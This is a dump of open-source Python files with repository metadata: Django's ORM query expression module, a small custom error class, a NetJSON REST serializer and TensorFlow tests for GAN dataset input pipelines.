# The following is a quoted % operator - it is quoted because it can be
# used in strings that also have parameter substitution.
MOD = '%%'
# Bitwise operators - note that these are generated by .bitand()
# and .bitor(), the '&' and '|' are reserved for boolean operator
# usage.
BITAND = '&'
BITOR = '|'
BITLEFTSHIFT = '<<'
BITRIGHTSHIFT = '>>'
def _combine(self, other, connector, reversed, node=None):
if not hasattr(other, 'resolve_expression'):
# everything must be resolvable to an expression
if isinstance(other, datetime.timedelta):
other = DurationValue(other, output_field=fields.DurationField())
else:
other = Value(other)
if reversed:
return CombinedExpression(other, connector, self)
return CombinedExpression(self, connector, other)
#############
# OPERATORS #
#############
def __add__(self, other):
return self._combine(other, self.ADD, False)
def __sub__(self, other):
return self._combine(other, self.SUB, False)
def __mul__(self, other):
return self._combine(other, self.MUL, False)
def __truediv__(self, other):
return self._combine(other, self.DIV, False)
def __mod__(self, other):
return self._combine(other, self.MOD, False)
def __pow__(self, other):
return self._combine(other, self.POW, False)
def __and__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
def bitand(self, other):
return self._combine(other, self.BITAND, False)
def bitleftshift(self, other):
return self._combine(other, self.BITLEFTSHIFT, False)
def bitrightshift(self, other):
return self._combine(other, self.BITRIGHTSHIFT, False)
def __or__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
def bitor(self, other):
return self._combine(other, self.BITOR, False)
def __radd__(self, other):
return self._combine(other, self.ADD, True)
def __rsub__(self, other):
return self._combine(other, self.SUB, True)
def __rmul__(self, other):
return self._combine(other, self.MUL, True)
def __rtruediv__(self, other):
return self._combine(other, self.DIV, True)
def __rmod__(self, other):
return self._combine(other, self.MOD, True)
def __rpow__(self, other):
return self._combine(other, self.POW, True)
def __rand__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
def __ror__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
class BaseExpression:
"""
Base class for all query expressions.
"""
# aggregate specific fields
is_summary = False
_output_field = None
def __init__(self, output_field=None):
if output_field is not None:
self._output_field = output_field
def get_db_converters(self, connection):
return [self.convert_value] + self.output_field.get_db_converters(connection)
def get_source_expressions(self):
return []
def set_source_expressions(self, exprs):
assert len(exprs) == 0
def _parse_expressions(self, *expressions):
return [
arg if hasattr(arg, 'resolve_expression') else (
F(arg) if isinstance(arg, str) else Value(arg)
) for arg in expressions
]
def as_sql(self, compiler, connection):
"""
Responsible for returning a (sql, [params]) tuple to be included
in the current query.
Different backends can provide their own implementation, by
providing an `as_{vendor}` method and patching the Expression:
```
def override_as_sql(self, compiler, connection):
# custom logic
return super(Expression, self).as_sql(compiler, connection)
setattr(Expression, 'as_' + connection.vendor, override_as_sql)
```
Arguments:
* compiler: the query compiler responsible for generating the query.
Must have a compile method, returning a (sql, [params]) tuple.
Calling compiler(value) will return a quoted `value`.
* connection: the database connection used for the current query.
Returns: (sql, params)
Where `sql` is a string containing ordered sql parameters to be
replaced with the elements of the list `params`.
"""
raise NotImplementedError("Subclasses must implement as_sql()")
@cached_property
def contains_aggregate(self):
for expr in self.get_source_expressions():
if expr and expr.contains_aggregate:
return True
return False
@cached_property
def contains_column_references(self):
for expr in self.get_source_expressions():
if expr and expr.contains_column_references:
return True
return False
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
"""
Provides the chance to do any preprocessing or validation before being
added to the query.
Arguments:
* query: the backend query implementation
* allow_joins: boolean allowing or denying use of joins
in this query
* reuse: a set of reusable joins for multijoins
* summarize: a terminal aggregate clause
* for_save: whether this expression about to be used in a save or update
Returns: an Expression to be added to the query.
"""
c = self.copy()
c.is_summary = summarize
c.set_source_expressions([
expr.resolve_expression(query, allow_joins, reuse, summarize)
for expr in c.get_source_expressions()
])
return c
def _prepare(self, field):
"""
Hook used by Lookup.get_prep_lookup() to do custom preparation.
"""
return self
@property
def field(self):
return self.output_field
@cached_property
def output_field(self):
"""
        Returns the output type of this expression.
"""
if self._output_field_or_none is None:
raise FieldError("Cannot resolve expression type, unknown output_field")
return self._output_field_or_none
@cached_property
def _output_field_or_none(self):
"""
Returns the output field of this expression, or None if no output type
can be resolved. Note that the 'output_field' property will raise
FieldError if no type can be resolved, but this attribute allows for
None values.
"""
if self._output_field is None:
self._resolve_output_field()
return self._output_field
def _resolve_output_field(self):
"""
Attempts to infer the output type of the expression. If the output
fields of all source fields match then we can simply infer the same
type here. This isn't always correct, but it makes sense most of the
time.
Consider the difference between `2 + 2` and `2 / 3`. Inferring
the type here is a convenience for the common case. The user should
supply their own output_field with more complex computations.
If a source does not have an `_output_field` then we exclude it from
this check. If all sources are `None`, then an error will be thrown
higher up the stack in the `output_field` property.
"""
if self._output_field is None:
sources = self.get_source_fields()
num_sources = len(sources)
if num_sources == 0:
self._output_field = None
else:
for source in sources:
if self._output_field is None:
self._output_field = source
if source is not None and not isinstance(self._output_field, source.__class__):
raise FieldError(
"Expression contains mixed types. You must set output_field")
def convert_value(self, value, expression, connection, context):
"""
Expressions provide their own converters because users have the option
of manually specifying the output_field which may be a different type
from the one the database returns.
"""
field = self.output_field
internal_type = field.get_internal_type()
if value is None:
return value
elif internal_type == 'FloatField':
return float(value)
elif internal_type.endswith('IntegerField'):
return int(value)
elif internal_type == 'DecimalField':
return backend_utils.typecast_decimal(value)
return value
def get_lookup(self, lookup):
return self.output_field.get_lookup(lookup)
def get_transform(self, name):
return self.output_field.get_transform(name)
def relabeled_clone(self, change_map):
clone = self.copy()
clone.set_source_expressions(
[e.relabeled_clone(change_map) for e in self.get_source_expressions()])
return clone
def copy(self):
c = copy.copy(self)
c.copied = True
return c
def get_group_by_cols(self):
if not self.contains_aggregate:
return [self]
cols = []
for source in self.get_source_expressions():
cols.extend(source.get_group_by_cols())
return cols
def get_source_fields(self):
"""
Returns the underlying field types used by this
aggregate.
"""
return [e._output_field_or_none for e in self.get_source_expressions()]
def asc(self, **kwargs):
return OrderBy(self, **kwargs)
def desc(self, **kwargs):
return OrderBy(self, descending=True, **kwargs)
def reverse_ordering(self):
return self
def flatten(self):
"""
Recursively yield this expression and all subexpressions, in
depth-first order.
"""
yield self
for expr in self.get_source_expressions():
if expr:
for inner_expr in expr.flatten():
yield inner_expr
class Expression(BaseExpression, Combinable):
"""
An expression that can be combined with other expressions.
"""
pass
class CombinedExpression(Expression):
def __init__(self, lhs, connector, rhs, output_field=None):
super(CombinedExpression, self).__init__(output_field=output_field)
self.connector = connector
self.lhs = lhs
self.rhs = rhs
def __repr__(self):
return "<{}: {}>".format(self.__class__.__name__, self)
def __str__(self):
return "{} {} {}".format(self.lhs, self.connector, self.rhs)
def get_source_expressions(self):
return [self.lhs, self.rhs]
def set_source_expressions(self, exprs):
self.lhs, self.rhs = exprs
def as_sql(self, compiler, connection):
try:
lhs_output = self.lhs.output_field
except FieldError:
lhs_output = None
try:
rhs_output = self.rhs.output_field
except FieldError:
rhs_output = None
if (not connection.features.has_native_duration_field and
((lhs_output and lhs_output.get_internal_type() == 'DurationField') or
(rhs_output and rhs_output.get_internal_type() == 'DurationField'))):
return DurationExpression(self.lhs, self.connector, self.rhs).as_sql(compiler, connection)
if (lhs_output and rhs_output and self.connector == self.SUB and
lhs_output.get_internal_type() in {'DateField', 'DateTimeField', 'TimeField'} and
                lhs_output.get_internal_type() == rhs_output.get_internal_type()):
return TemporalSubtraction(self.lhs, self.rhs).as_sql(compiler, connection)
expressions = []
expression_params = []
sql, params = compiler.compile(self.lhs)
expressions.append(sql)
expression_params.extend(params)
sql, params = compiler.compile(self.rhs)
expressions.append(sql)
expression_params.extend(params)
# order of precedence
expression_wrapper = '(%s)'
sql = connection.ops.combine_expression(self.connector, expressions)
return expression_wrapper % sql, expression_params
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = self.copy()
c.is_summary = summarize
c.lhs = c.lhs.resolve_expression(query, allow_joins, reuse, summarize, for_save)
c.rhs = c.rhs.resolve_expression(query, allow_joins, reuse, summarize, for_save)
return c
class DurationExpression(CombinedExpression):
def compile(self, side, compiler, connection):
if not isinstance(side, DurationValue):
try:
output = side.output_field
except FieldError:
pass
else:
if output.get_internal_type() == 'DurationField':
sql, params = compiler.compile(side)
return connection.ops.format_for_duration_arithmetic(sql), params
return compiler.compile(side)
def as_sql(self, compiler, connection):
connection.ops.check_expression_support(self)
expressions = []
expression_params = []
sql, params = self.compile(self.lhs, compiler, connection)
expressions.append(sql)
expression_params.extend(params)
sql, params = self.compile(self.rhs, compiler, connection)
expressions.append(sql)
expression_params.extend(params)
# order of precedence
expression_wrapper = '(%s)'
sql = connection.ops.combine_duration_expression(self.connector, expressions)
return expression_wrapper % sql, expression_params
class TemporalSubtraction(CombinedExpression):
def __init__(self, lhs, rhs):
super(TemporalSubtraction, self).__init__(lhs, self.SUB, rhs, output_field=fields.DurationField())
def as_sql(self, compiler, connection):
connection.ops.check_expression_support(self)
lhs = compiler.compile(self.lhs, connection)
rhs = compiler.compile(self.rhs, connection)
return connection.ops.subtract_temporals(self.lhs.output_field.get_internal_type(), lhs, rhs)
class F(Combinable):
"""
An object capable of resolving references to existing query objects.
"""
def __init__(self, name):
"""
Arguments:
* name: the name of the field this expression references
"""
self.name = name
def __repr__(self):
return "{}({})".format(self.__class__.__name__, self.name)
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
return query.resolve_ref(self.name, allow_joins, reuse, summarize)
def asc(self, **kwargs):
return OrderBy(self, **kwargs)
def desc(self, **kwargs):
return OrderBy(self, descending=True, **kwargs)
class ResolvedOuterRef(F):
"""
An object that contains a reference to an outer query.
In this case, the reference to the outer query has been resolved because
the inner query has been used as a subquery.
"""
def as_sql(self, *args, **kwargs):
raise ValueError(
'This queryset contains a reference to an outer query and may '
'only be used in a subquery.'
)
def _prepare(self, output_field=None):
return self
class OuterRef(F):
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
if isinstance(self.name, self.__class__):
return self.name
return ResolvedOuterRef(self.name)
def _prepare(self, output_field=None):
return self
class Func(Expression):
"""
An SQL function call.
"""
function = None
template = '%(function)s(%(expressions)s)'
arg_joiner = ', '
arity = None # The number of arguments the function accepts.
def __init__(self, *expressions, **extra):
if self.arity is not None and len(expressions) != self.arity:
raise TypeError(
"'%s' takes exactly %s %s (%s given)" % (
self.__class__.__name__,
self.arity,
"argument" if self.arity == 1 else "arguments",
len(expressions),
)
)
output_field = extra.pop('output_field', None)
super(Func, self).__init__(output_field=output_field)
self.source_expressions = self._parse_expressions(*expressions)
self.extra = extra
def __repr__(self):
args = self.arg_joiner.join(str(arg) for arg in self.source_expressions)
extra = ', '.join(str(key) + '=' + str(val) for key, val in self.extra.items())
if extra:
return "{}({}, {})".format(self.__class__.__name__, args, extra)
return "{}({})".format(self.__class__.__name__, args)
def get_source_expressions(self):
return self.source_expressions
def set_source_expressions(self, exprs):
self.source_expressions = exprs
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = self.copy()
c.is_summary = summarize
for pos, arg in enumerate(c.source_expressions):
c.source_expressions[pos] = arg.resolve_expression(query, allow_joins, reuse, summarize, for_save)
return c
def as_sql(self, compiler, connection, function=None, template=None, arg_joiner=None, **extra_context):
connection.ops.check_expression_support(self)
sql_parts = []
params = []
for arg in self.source_expressions:
arg_sql, arg_params = compiler.compile(arg)
sql_parts.append(arg_sql)
params.extend(arg_params)
data = self.extra.copy()
data.update(**extra_context)
# Use the first supplied value in this order: the parameter to this
# method, a value supplied in __init__()'s **extra (the value in
# `data`), or the value defined on the class.
if function is not None:
data['function'] = function
else:
data.setdefault('function', self.function)
template = template or data.get('template', self.template)
arg_joiner = arg_joiner or data.get('arg_joiner', self.arg_joiner)
data['expressions'] = data['field'] = arg_joiner.join(sql_parts)
return template % data, params
def as_sqlite(self, compiler, connection):
sql, params = self.as_sql(compiler, connection)
try:
if self.output_field.get_internal_type() == 'DecimalField':
sql = 'CAST(%s AS NUMERIC)' % sql
except FieldError:
pass
return sql, params
def copy(self):
copy = super(Func, self).copy()
copy.source_expressions = self.source_expressions[:]
copy.extra = self.extra.copy()
return copy
class Value(Expression):
"""
Represents a wrapped value as a node within an expression
"""
def __init__(self, value, output_field=None):
"""
Arguments:
* value: the value this expression represents. The value will be
added into the sql parameter list and properly quoted.
* output_field: an instance of the model field type that this
expression will return, such as IntegerField() or CharField().
"""
super(Value, self).__init__(output_field=output_field)
self.value = value
def __repr__(self):
return "{}({})".format(self.__class__.__name__, self.value)
def as_sql(self, compiler, connection):
connection.ops.check_expression_support(self)
val = self.value
# check _output_field to avoid triggering an exception
if self._output_field is not None:
if self.for_save:
val = self.output_field.get_db_prep_save(val, connection=connection)
else:
val = self.output_field.get_db_prep_value(val, connection=connection)
if hasattr(self._output_field, 'get_placeholder'):
return self._output_field.get_placeholder(val, compiler, connection), [val]
if val is None:
# cx_Oracle does not always convert None to the appropriate
# NULL type (like in case expressions using numbers), so we
# use a literal SQL NULL
return 'NULL', []
return '%s', [val]
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = super(Value, self).resolve_expression(query, allow_joins, reuse, summarize, for_save)
c.for_save = for_save
return c
def get_group_by_cols(self):
return []
class DurationValue(Value):
def as_sql(self, compiler, connection):
connection.ops.check_expression_support(self)
if connection.features.has_native_duration_field:
return super(DurationValue, self).as_sql(compiler, connection)
return connection.ops.date_interval_sql(self.value)
class RawSQL(Expression):
def __init__(self, sql, params, output_field=None):
if output_field is None:
output_field = fields.Field()
self.sql, self.params = sql, params
super(RawSQL, self).__init__(output_field=output_field)
def __repr__(self):
return "{}({}, {})".format(self.__class__.__name__, self.sql, self.params)
def as_sql(self, compiler, connection):
return '(%s)' % self.sql, self.params
def get_group_by_cols(self):
return [self]
class Star(Expression):
def __repr__(self):
return "'*'"
def as_sql(self, compiler, connection):
return '*', []
class Random(Expression):
def __init__(self):
super(Random, self).__init__(output_field=fields.FloatField())
def __repr__(self):
return "Random()"
def as_sql(self, compiler, connection):
return connection.ops.random_function_sql(), []
class Col(Expression):
contains_column_references = True
def __init__(self, alias, target, output_field=None):
if output_field is None:
output_field = target
super(Col, self).__init__(output_field=output_field)
self.alias, self.target = alias, target
def __repr__(self):
return "{}({}, {})".format(
self.__class__.__name__, self.alias, self.target)
def as_sql(self, compiler, connection):
qn = compiler.quote_name_unless_alias
return "%s.%s" % (qn(self.alias), qn(self.target.column)), []
def relabeled_clone(self, relabels):
return self.__class__(relabels.get(self.alias, self.alias), self.target, self.output_field)
def get_group_by_cols(self):
return [self]
def get_db_converters(self, connection):
if self.target == self.output_field:
return self.output_field.get_db_converters(connection)
return (self.output_field.get_db_converters(connection) +
self.target.get_db_converters(connection))
class Ref(Expression):
"""
Reference to column alias of the query. For example, Ref('sum_cost') in
qs.annotate(sum_cost=Sum('cost')) query.
"""
def __init__(self, refs, source):
super(Ref, self).__init__()
self.refs, self.source = refs, source
def __repr__(self):
return "{}({}, {})".format(self.__class__.__name__, self.refs, self.source)
def get_source_expressions(self):
return [self.source]
def set_source_expressions(self, exprs):
self.source, = exprs
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
# The sub-expression `source` has already been resolved, as this is
# just a reference to the name of `source`.
return self
def relabeled_clone(self, relabels):
return self
def as_sql(self, compiler, connection):
return "%s" % connection.ops.quote_name(self.refs), []
def get_group_by_cols(self):
return [self]
class ExpressionWrapper(Expression):
"""
An expression that can wrap another expression so that it can provide
extra context to the inner expression, such as the output_field.
"""
def __init__(self, expression, output_field):
super(ExpressionWrapper, self).__init__(output_field=output_field)
self.expression = expression
def set_source_expressions(self, exprs):
self.expression = exprs[0]
def get_source_expressions(self):
return [self.expression]
def as_sql(self, compiler, connection):
return self.expression.as_sql(compiler, connection)
def __repr__(self):
return "{}({})".format(self.__class__.__name__, self.expression)
class When(Expression):
template = 'WHEN %(condition)s THEN %(result)s'
def __init__(self, condition=None, then=None, **lookups):
if lookups and condition is None:
condition, lookups = Q(**lookups), None
if condition is None or not isinstance(condition, Q) or lookups:
raise TypeError("__init__() takes either a Q object or lookups as keyword arguments")
super(When, self).__init__(output_field=None)
self.condition = condition
self.result = self._parse_expressions(then)[0]
def __str__(self):
return "WHEN %r THEN %r" % (self.condition, self.result)
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, self)
def get_source_expressions(self):
return [self.condition, self.result]
def set_source_expressions(self, exprs):
self.condition, self.result = exprs
def get_source_fields(self):
# We're only interested in the fields of the result expressions.
return [self.result._output_field_or_none]
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = self.copy()
c.is_summary = summarize
if hasattr(c.condition, 'resolve_expression'):
c.condition = c.condition.resolve_expression(query, allow_joins, reuse, summarize, False)
c.result = c.result.resolve_expression(query, allow_joins, reuse, summarize, for_save)
return c
def as_sql(self, compiler, connection, template=None, **extra_context):
connection.ops.check_expression_support(self)
template_params = extra_context
sql_params = []
condition_sql, condition_params = compiler.compile(self.condition)
template_params['condition'] = condition_sql
sql_params.extend(condition_params)
result_sql, result_params = compiler.compile(self.result)
template_params['result'] = result_sql
sql_params.extend(result_params)
template = template or self.template
return template % template_params, sql_params
def get_group_by_cols(self):
# This is not a complete expression and cannot be used in GROUP BY.
cols = []
for source in self.get_source_expressions():
cols.extend(source.get_group_by_cols())
return cols
class Case(Expression):
"""
An SQL searched CASE expression:
CASE
WHEN n > 0
THEN 'positive'
WHEN n < 0
THEN 'negative'
ELSE 'zero'
END
"""
template = 'CASE %(cases)s ELSE %(default)s END'
case_joiner = ' '
def __init__(self, *cases, **extra):
if not all(isinstance(case, When) for case in cases):
raise TypeError("Positional arguments must all be When objects.")
default = extra.pop('default', None)
output_field = extra.pop('output_field', None)
super(Case, self).__init__(output_field)
self.cases = list(cases)
self.default = self._parse_expressions(default)[0]
self.extra = extra
def __str__(self):
return "CASE %s, ELSE %r" % (', '.join(str(c) for c in self.cases), self.default)
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, self)
def get_source_expressions(self):
return self.cases + [self.default]
def set_source_expressions(self, exprs):
self.cases = exprs[:-1]
self.default = exprs[-1]
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = self.copy()
c.is_summary = summarize
for pos, case in enumerate(c.cases):
c.cases[pos] = case.resolve_expression(query, allow_joins, reuse, summarize, for_save)
c.default = c.default.resolve_expression(query, allow_joins, reuse, summarize, for_save)
return c
def copy(self):
c = super(Case, self).copy()
c.cases = c.cases[:]
return c
def as_sql(self, compiler, connection, template=None, case_joiner=None, **extra_context):
connection.ops.check_expression_support(self)
if not self.cases:
return compiler.compile(self.default)
template_params = self.extra.copy()
template_params.update(extra_context)
case_parts = []
sql_params = []
for case in self.cases:
try:
case_sql, case_params = compiler.compile(case)
except EmptyResultSet:
continue
case_parts.append(case_sql)
sql_params.extend(case_params)
default_sql, default_params = compiler.compile(self.default)
if not case_parts:
return default_sql, default_params
case_joiner = case_joiner or self.case_joiner
template_params['cases'] = case_joiner.join(case_parts)
template_params['default'] = default_sql
sql_params.extend(default_params)
template = template or template_params.get('template', self.template)
sql = template % template_params
if self._output_field_or_none is not None:
sql = connection.ops.unification_cast_sql(self.output_field) % sql
return sql, sql_params
class Subquery(Expression):
"""
An explicit subquery. It may contain OuterRef() references to the outer
query which will be resolved when it is applied to that query.
"""
template = '(%(subquery)s)'
def __init__(self, queryset, output_field=None, **extra):
self.queryset = queryset
self.extra = extra
if output_field is None and len(self.queryset.query.select) == 1:
output_field = self.queryset.query.select[0].field
super(Subquery, self).__init__(output_field)
def copy(self):
clone = super(Subquery, self).copy()
clone.queryset = clone.queryset.all()
return clone
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
clone = self.copy()
clone.is_summary = summarize
clone.queryset.query.bump_prefix(query)
# Need to recursively resolve these.
def resolve_all(child):
if hasattr(child, 'children'):
[resolve_all(_child) for _child in child.children]
if hasattr(child, 'rhs'):
child.rhs = resolve(child.rhs)
def resolve(child):
if hasattr(child, 'resolve_expression'):
return child.resolve_expression(
query=query, allow_joins=allow_joins, reuse=reuse,
summarize=summarize, for_save=for_save,
)
return child
resolve_all(clone.queryset.query.where)
for key, value in clone.queryset.query.annotations.items():
if isinstance(value, Subquery):
clone.queryset.query.annotations[key] = resolve(value)
return clone
def get_source_expressions(self):
return [
x for x in [
getattr(expr, 'lhs', None)
for expr in self.queryset.query.where.children
] if x
]
def relabeled_clone(self, change_map):
clone = self.copy()
clone.queryset.query = clone.queryset.query.relabeled_clone(change_map)
clone.queryset.query.external_aliases.update(
alias for alias in change_map.values()
if alias not in clone.queryset.query.tables
)
return clone
def as_sql(self, compiler, connection, template=None, **extra_context):
connection.ops.check_expression_support(self)
template_params = self.extra.copy()
template_params.update(extra_context)
template_params['subquery'], sql_params = self.queryset.query.get_compiler(connection=connection).as_sql()
template = template or template_params.get('template', self.template)
sql = template % template_params
sql = connection.ops.unification_cast_sql(self.output_field) % sql
return sql, sql_params
def _prepare(self, output_field):
# This method will only be called if this instance is the "rhs" in an
# expression: the wrapping () must be removed (as the expression that
# contains this will provide them). SQLite evaluates ((subquery))
# differently than the other databases.
if self.template == '(%(subquery)s)':
clone = self.copy()
clone.template = '%(subquery)s'
return clone
return self
class Exists(Subquery):
template = 'EXISTS(%(subquery)s)'
def __init__(self, *args, **kwargs):
self.negated = kwargs.pop('negated', False)
super(Exists, self).__init__(*args, **kwargs)
def __invert__(self):
return type(self)(self.queryset, self.output_field, negated=(not self.negated), **self.extra)
@property
def output_field(self):
return fields.BooleanField()
def resolve_expression(self, query=None, **kwargs):
# As a performance optimization, remove ordering since EXISTS doesn't
# care about it, just whether or not a row matches.
self.queryset = self.queryset.order_by()
return super(Exists, self).resolve_expression(query, **kwargs)
def as_sql(self, compiler, connection, template=None, **extra_context):
sql, params = super(Exists, self).as_sql(compiler, connection, template, **extra_context)
if self.negated:
sql = 'NOT {}'.format(sql)
return sql, params
def as_oracle(self, compiler, connection, template=None, **extra_context):
# Oracle doesn't allow EXISTS() in the SELECT list, so wrap it with a
# CASE WHEN expression. Change the template since the When expression
# requires a left hand side (column) to compare against.
sql, params = self.as_sql(compiler, connection, template, **extra_context)
sql = 'CASE WHEN {} THEN 1 ELSE 0 END'.format(sql)
return sql, params
class OrderBy(BaseExpression):
template = '%(expression)s %(ordering)s'
def __init__(self, expression, descending=False, nulls_first=False, nulls_last=False):
if nulls_first and nulls_last:
raise ValueError('nulls_first and nulls_last are mutually exclusive')
self.nulls_first = nulls_first
self.nulls_last = nulls_last
self.descending = descending
if not hasattr(expression, 'resolve_expression'):
raise ValueError('expression must be an expression type')
self.expression = expression
def __repr__(self):
return "{}({}, descending={})".format(
self.__class__.__name__, self.expression, self.descending)
def set_source_expressions(self, exprs):
self.expression = exprs[0]
def get_source_expressions(self):
return [self.expression]
def as_sql(self, compiler, connection, template=None, **extra_context):
if not template:
if self.nulls_last:
template = '%s NULLS LAST' % self.template
elif self.nulls_first:
template = '%s NULLS FIRST' % self.template
connection.ops.check_expression_support(self)
expression_sql, params = compiler.compile(self.expression)
placeholders = {
'expression': expression_sql,
'ordering': 'DESC' if self.descending else 'ASC',
}
placeholders.update(extra_context)
template = template or self.template
return (template % placeholders).rstrip(), params
def as_sqlite(self, compiler, connection):
template = None
if self.nulls_last:
template = '%(expression)s IS NULL, %(expression)s %(ordering)s'
elif self.nulls_first:
template = '%(expression)s IS NOT NULL, %(expression)s %(ordering)s'
return self.as_sql(compiler, connection, template=template)
def as_mysql(self, compiler, connection):
template = None
if self.nulls_last:
template = 'IF(ISNULL(%(expression)s),1,0), %(expression)s %(ordering)s '
elif self.nulls_first:
template = 'IF(ISNULL(%(expression)s),0,1), %(expression)s %(ordering)s '
return self.as_sql(compiler, connection, template=template)
def get_group_by_cols(self):
cols = []
for source in self.get_source_expressions():
cols.extend(source.get_group_by_cols())
return cols
def reverse_ordering(self):
self.descending = not self.descending
return self
def asc(self):
self.descending = False
def desc(self):
self.descending = True
|
{
"content_hash": "81379e47c364689bc02ffe461ab01f55",
"timestamp": "",
"source": "github",
"line_count": 1087,
"max_line_length": 114,
"avg_line_length": 35.723091076356944,
"alnum_prop": 0.6110581751693235,
"repo_name": "twz915/django",
"id": "a1cec2393afe17626830474434e709499c8a4641",
"size": "38831",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "django/db/models/expressions.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "55929"
},
{
"name": "HTML",
"bytes": "182880"
},
{
"name": "JavaScript",
"bytes": "252645"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Python",
"bytes": "11852079"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "130"
}
],
"symlink_target": ""
}
|
'''Custom error classes.'''
class CollectionError(Exception):
'''Raise when a collection error occurs.'''
|
{
"content_hash": "8e7d69ac31701e3119d2774c40438107",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 47,
"avg_line_length": 18.833333333333332,
"alnum_prop": 0.6902654867256637,
"repo_name": "getavalon/core",
"id": "964e55348e93ccd1cffa598b0ab49923fe08c697",
"size": "218",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "avalon/vendor/clique/error.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "688391"
},
{
"name": "Shell",
"bytes": "725"
}
],
"symlink_target": ""
}
|
from collections import OrderedDict
from rest_framework import serializers
class NetworkCollectionSerializer(serializers.ListSerializer):
"""
NetJSON NetworkCollection
"""
@property
def data(self):
return super(serializers.ListSerializer, self).data
def to_representation(self, data):
return OrderedDict(
(
('type', 'NetworkCollection'),
('collection', super().to_representation(data)),
)
)
class NetworkGraphSerializer(serializers.ModelSerializer):
"""
NetJSON NetworkGraph
"""
def to_representation(self, obj):
return obj.json(dict=True)
class Meta:
list_serializer_class = NetworkCollectionSerializer
|
{
"content_hash": "2d90e00ee2250b7119f545cc75c7887f",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 64,
"avg_line_length": 22.818181818181817,
"alnum_prop": 0.6427622841965471,
"repo_name": "interop-dev/django-netjsongraph",
"id": "3323a802c6d1937727d152aa42865704d13a9eca",
"size": "753",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "django_netjsongraph/api/serializers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "3293"
},
{
"name": "HTML",
"bytes": "3803"
},
{
"name": "JavaScript",
"bytes": "25492"
},
{
"name": "Python",
"bytes": "83655"
}
],
"symlink_target": ""
}
|
"""Tests for datasets."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import flags
from absl.testing import flagsaver
from absl.testing import parameterized
from compare_gan import datasets
import tensorflow as tf
FLAGS = flags.FLAGS
_TPU_SUPPORTED_TYPES = {
tf.float32, tf.int32, tf.complex64, tf.int64, tf.bool, tf.bfloat16
}
def _preprocess_fn_id(images, labels):
return {"images": images}, labels
def _preprocess_fn_add_noise(images, labels, seed=None):
del labels
tf.set_random_seed(seed)
noise = tf.random.uniform([128], maxval=1.0)
return {"images": images}, noise
class DatasetsTest(parameterized.TestCase, tf.test.TestCase):
def setUp(self):
super(DatasetsTest, self).setUp()
FLAGS.data_shuffle_buffer_size = 100
def get_element_and_verify_shape(self, dataset_name, expected_shape):
dataset = datasets.get_dataset(dataset_name)
dataset = dataset.eval_input_fn()
image, label = dataset.make_one_shot_iterator().get_next()
# Check if shape is known at compile time, required for TPUs.
self.assertAllEqual(image.shape.as_list(), expected_shape)
self.assertEqual(image.dtype, tf.float32)
self.assertIn(label.dtype, _TPU_SUPPORTED_TYPES)
with self.cached_session() as session:
image = session.run(image)
self.assertEqual(image.shape, expected_shape)
self.assertGreaterEqual(image.min(), 0.0)
self.assertLessEqual(image.max(), 1.0)
def test_mnist(self):
self.get_element_and_verify_shape("mnist", (28, 28, 1))
def test_fashion_mnist(self):
self.get_element_and_verify_shape("fashion-mnist", (28, 28, 1))
def test_celeba(self):
self.get_element_and_verify_shape("celeb_a", (64, 64, 3))
def test_lsun(self):
self.get_element_and_verify_shape("lsun-bedroom", (128, 128, 3))
def _run_train_input_fn(self, dataset_name, preprocess_fn):
dataset = datasets.get_dataset(dataset_name)
with tf.Graph().as_default():
dataset = dataset.input_fn(params={"batch_size": 1},
preprocess_fn=preprocess_fn)
iterator = dataset.make_initializable_iterator()
with self.session() as sess:
sess.run(iterator.initializer)
next_batch = iterator.get_next()
return [sess.run(next_batch) for _ in range(5)]
@parameterized.named_parameters(
("FakeCifar", _preprocess_fn_id),
("FakeCifarWithRandomNoise", _preprocess_fn_add_noise),
)
@flagsaver.flagsaver
def test_train_input_fn_is_determinsitic(self, preprocess_fn):
FLAGS.data_fake_dataset = True
batches1 = self._run_train_input_fn("cifar10", preprocess_fn)
batches2 = self._run_train_input_fn("cifar10", preprocess_fn)
for i in range(len(batches1)):
# Check that both runs got the same images/noise
self.assertAllClose(batches1[i][0], batches2[i][0])
self.assertAllClose(batches1[i][1], batches2[i][1])
@flagsaver.flagsaver
def test_train_input_fn_noise_changes(self):
FLAGS.data_fake_dataset = True
batches = self._run_train_input_fn("cifar10", _preprocess_fn_add_noise)
for i in range(1, len(batches)):
self.assertNotAllClose(batches[0][1], batches[i][1])
self.assertNotAllClose(batches[i - 1][1], batches[i][1])
if __name__ == "__main__":
tf.test.main()
|
{
"content_hash": "95355088941de76d5484dde537df743f",
"timestamp": "",
"source": "github",
"line_count": 99,
"max_line_length": 75,
"avg_line_length": 33.888888888888886,
